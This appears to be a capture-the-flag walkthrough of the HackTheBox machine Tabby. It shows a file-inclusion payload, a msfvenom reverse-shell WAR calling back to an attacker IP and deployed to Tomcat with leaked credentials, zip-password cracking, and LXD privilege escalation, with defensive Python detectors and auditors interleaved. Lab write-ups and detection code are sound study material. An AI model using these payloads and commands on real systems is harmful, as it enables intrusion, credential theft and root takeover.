Port scanning
nmap -sC -sV -T5 10.10.10.194 -oN nmap.txt
Web site file inclusion
#Add a hosts entry
echo "10.10.10.194 megahosting.htb">>/etc/hosts
A file inclusion vulnerability exists:
http://megahosting.htb/news.php?file=../../../../etc/passwd
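The request above is the kind of thing a defender wants to see in the access log before, not after, the box is owned. The following is an added example, not code from the original write-up: a small Python scanner that runs over Apache combined-format log lines (the sample lines are constructed for this example), percent-decodes each query parameter repeatedly, and flags `..` path segments and well-known sensitive file names. It also includes `safe_resolve()`, the server-side check that `news.php` evidently lacked: resolve the requested name under a base directory and refuse anything that escapes it. The paths and parameter names are assumptions for the example.

```python
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines in Apache combined format. They are made up for this
# example and are not log data from the original write-up.
SAMPLE_LOG = [
    '10.10.14.51 - - [20/Jun/2020:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.10.14.51 - - [20/Jun/2020:10:01:09 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.51 - - [20/Jun/2020:10:01:15 +0000] "GET /news.php?file=..%2F..%2F..%2Fvar%2Flog%2Fauth.log HTTP/1.1" 200 900 "-" "curl/7.68.0"',
    '10.10.14.51 - - [20/Jun/2020:10:01:20 +0000] "GET /news.php?file=%252e%252e%252fetc%252fshadow HTTP/1.1" 404 300 "-" "curl/7.68.0"',
    '10.10.14.52 - - [20/Jun/2020:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

# ip, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# ".." as a complete path segment, with either separator
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
# file names worth alerting on in a file parameter, traversal or not
SENSITIVE_NAMES = ('etc/passwd', 'etc/shadow', 'tomcat-users.xml')


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e -> %2e -> .) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> list:
    """Return the reasons a query-parameter value looks like a file-inclusion attempt."""
    normalised = decode_fully(value).replace('\\', '/')
    reasons = []
    if TRAVERSAL_RE.search(normalised):
        reasons.append('traversal')
    if any(name in normalised for name in SENSITIVE_NAMES):
        reasons.append('sensitive-file')
    return reasons


def scan_log(lines) -> list:
    """Scan access-log lines and return one finding per suspicious query parameter."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        query = urlsplit(match.group('target')).query
        # parse_qsl decodes one level of percent-encoding; classify_value handles the rest
        for name, raw in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(raw)
            if reasons:
                findings.append({
                    'ip': match.group('ip'),
                    'status': int(match.group('status')),
                    'param': name,
                    'value': decode_fully(raw),
                    'reasons': reasons,
                })
    return findings


def safe_resolve(base_dir: str, requested: str):
    """Server-side counterpart: resolve a user-supplied name inside base_dir, or return None.

    After realpath() the candidate must still sit below base_dir, so '../' sequences,
    absolute paths and symlinks cannot escape it.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(safe_resolve('/srv/app/files', '../../../../etc/passwd'))
```

Note that the fourth sample line is double-encoded; a scanner that decodes only once sees `%2e%2e%2f` and misses it, which is why `decode_fully()` loops. A 404 on such a request still deserves an alert: it shows someone probing, even though that particular path did not resolve.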
File upload
Run wfuzz against 10.10.10.194:8080.
A tomcat-users.xml file under XXX will contain account credentials,
so:
wfuzz -u "http://megahosting.htb/news.php?file=../../../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 0
From tomcat-users.xml we can see that tomcat has only two roles, admin-gui and manager-script,
and no manager-gui role,
so it is not possible to log in to http://10.10.10.194/manager/html.
manager-gui — Access to the HTML interface.
manager-status — Access to the "Server Status" page only.
manager-script — Access to the tools-friendly plain text interface that is described in this document, and to the "Server Status" page.
manager-jmx — Access to JMX proxy interface and to the "Server Status" page.
admin-gui - use this role for the graphical web interface.
admin-script - use this role for the scripting web interface.
Adding a virtual host through host-manager failed [but tomcat does have the admin-gui role, so deploying that way might still succeed…]
Since the manager-script role is present, a file can be uploaded and a shell deployed with curl.
- Why is it deployed under http://localhost:8080/manager/text/deploy?path=?
As explained in the official documentation
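The whole foothold hinges on two things a Tomcat administrator controls: which roles tomcat-users.xml hands out, and whether the web server account can read that file at all. The following is an added example, not code from the write-up or from the Tomcat project: a Python audit that parses a tomcat-users.xml (the sample document and its placeholder passwords are constructed for this example), maps each user's roles to the capabilities listed in the documentation quoted above, and flags users who can deploy applications or add virtual hosts. It also flags a user holding manager-gui together with manager-script or manager-jmx, a combination the Tomcat Manager documentation advises against, and provides a mode check for the file on disk.

```python
import os
import stat
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml. Usernames, roles and passwords are made up for this
# example; the password values are placeholders, not credentials from the write-up.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="PLACEHOLDER-1" roles="admin-gui,manager-script"/>
  <user username="monitor" password="PLACEHOLDER-2" roles="manager-status"/>
  <user username="ops" password="PLACEHOLDER-3" roles="manager-gui,manager-script"/>
</tomcat-users>
"""

# What each Manager / Host Manager role grants, per the Tomcat documentation quoted above.
ROLE_CAPABILITY = {
    'manager-gui': 'HTML Manager interface (deploy/undeploy applications)',
    'manager-status': 'Server Status page only',
    'manager-script': 'text Manager interface (deploy/undeploy applications, scriptable)',
    'manager-jmx': 'JMX proxy interface and Server Status page',
    'admin-gui': 'HTML Host Manager interface (add/remove virtual hosts)',
    'admin-script': 'text Host Manager interface (add/remove virtual hosts, scriptable)',
}
DEPLOY_ROLES = {'manager-gui', 'manager-script'}
HOST_ROLES = {'admin-gui', 'admin-script'}


def _local_name(tag: str) -> str:
    """Strip the XML namespace so the parser works with or without xmlns on the root."""
    return tag.rsplit('}', 1)[-1]


def audit_tomcat_users(xml_text: str) -> dict:
    """Map each user to its roles and to the findings a reviewer should act on."""
    root = ET.fromstring(xml_text)
    report = {}
    for element in root.iter():
        if _local_name(element.tag) != 'user':
            continue
        username = element.get('username', '')
        roles = {r.strip() for r in (element.get('roles') or '').split(',') if r.strip()}
        findings = []
        if roles & DEPLOY_ROLES:
            findings.append('can deploy arbitrary web applications via '
                            + ', '.join(sorted(roles & DEPLOY_ROLES)))
        if roles & HOST_ROLES:
            findings.append('can add virtual hosts via ' + ', '.join(sorted(roles & HOST_ROLES)))
        # The Tomcat Manager docs recommend not granting manager-script or manager-jmx to a
        # user who also has manager-gui: the HTML interface's CSRF protection does not
        # extend to the other interfaces.
        if 'manager-gui' in roles and roles & {'manager-script', 'manager-jmx'}:
            findings.append('combines manager-gui with a non-HTML manager role')
        report[username] = {'roles': sorted(roles), 'findings': findings}
    return report


def mode_readable_by_others(mode: int) -> bool:
    """True if the mode grants read to group or other, i.e. a web server account could read it."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def readable_by_others(path: str) -> bool:
    """Check an on-disk tomcat-users.xml; the LFI above only paid off because it was readable."""
    return mode_readable_by_others(os.stat(path).st_mode)


if __name__ == '__main__':
    for user, info in audit_tomcat_users(SAMPLE_TOMCAT_USERS).items():
        print(user, info['roles'], info['findings'])
```

Run it against the real file with `audit_tomcat_users(open('/path/to/tomcat-users.xml').read())` and `readable_by_others('/path/to/tomcat-users.xml')`; the second check is the one that would have stopped the credential leak here even with the LFI present.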
Generating the shell
#msfvenom -l payloads | grep reverse_tcp    #look up a particular payload
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.51 lport=4444 -f war > get.war
Uploading the shell
curl -f -T get.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/get.war"
#Check whether the shell was deployed successfully
http://10.10.10.194:8080/manager/text/list
Listen on port 4444 and catch the shell.
Cracking the archive
File download
10.10.10.194/files/16162020_backup.zip
Cracking the archive
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip
This yields ash's password:
tomcat@tabby:/home$ su ash
su ash
Password: admin@it
ash@tabby:/home$ whoami
whoami
Privilege escalation
Enumerate with the LinEnum script
LXD privilege escalation
#Attacker machine
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python -m SimpleHTTPServer
#Target machine
cd /tmp
wget http://192.168.1.107:8000/alpine-v3.10-x86_64-20191008_1227.tar.gz
#Import the image and give it the alias myimage
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
#Mount the host root filesystem at /mnt/root
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root/root
ls
flag.txt
cat flag.txt
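Everything in the LXD step follows from one host-side fact: the user is a member of the lxd group, which lets an unprivileged account ask the LXD daemon to start a privileged container with the host filesystem mounted inside. The following is an added example, not code from the write-up: a Python check that parses /etc/group (the sample content is constructed) and reports members of groups that are effectively root-equivalent, so an auditor or a hardening script can catch this before an attacker does. The group list and the reasons given are the author's assumptions for the example.

```python
# Constructed /etc/group excerpt used as sample input; not taken from the target machine.
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
docker:x:999:
"""

# Groups whose membership is effectively root on a typical Linux host, and why.
ROOT_EQUIVALENT_GROUPS = {
    'lxd': 'can start a privileged container with the host filesystem mounted inside',
    'docker': 'can start a container with the host filesystem bind-mounted',
    'disk': 'raw read/write access to block devices',
}


def parse_group_file(text: str) -> dict:
    """Parse /etc/group content into {group_name: [members...]}."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) < 4:
            continue  # malformed line; /etc/group has name:password:gid:members
        name, members = fields[0], fields[3]
        groups[name] = [m for m in members.split(',') if m]
    return groups


def root_equivalent_members(text: str) -> dict:
    """Return {group: members} for root-equivalent groups that have at least one member."""
    groups = parse_group_file(text)
    return {g: groups[g] for g in ROOT_EQUIVALENT_GROUPS if groups.get(g)}


def groups_for_user(text: str, user: str) -> list:
    """List the supplementary groups a given user belongs to, per /etc/group."""
    return sorted(g for g, members in parse_group_file(text).items() if user in members)


def check_host(path: str = '/etc/group') -> dict:
    """Run the check against the live system's group file."""
    with open(path) as fh:
        return root_equivalent_members(fh.read())


if __name__ == '__main__':
    for group, members in root_equivalent_members(SAMPLE_GROUP).items():
        print(f'{group}: {", ".join(members)} ({ROOT_EQUIVALENT_GROUPS[group]})')
```

On the sample input the only hit is `lxd: ash`, which is exactly the condition the escalation above depends on. The mitigation is to keep lxd group membership restricted to administrators and to treat it with the same care as sudo.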
Other notes
- If the admin-script role is present, deploy with the following command
#Example command:
curl -u test:test "http://localhost:8080/host-manager/text/add?name=www.awesomeserver.com&aliases=awesomeserver.com&appBase=/mnt/appDir&deployOnStartup=true"
- Read the official documentation more carefully.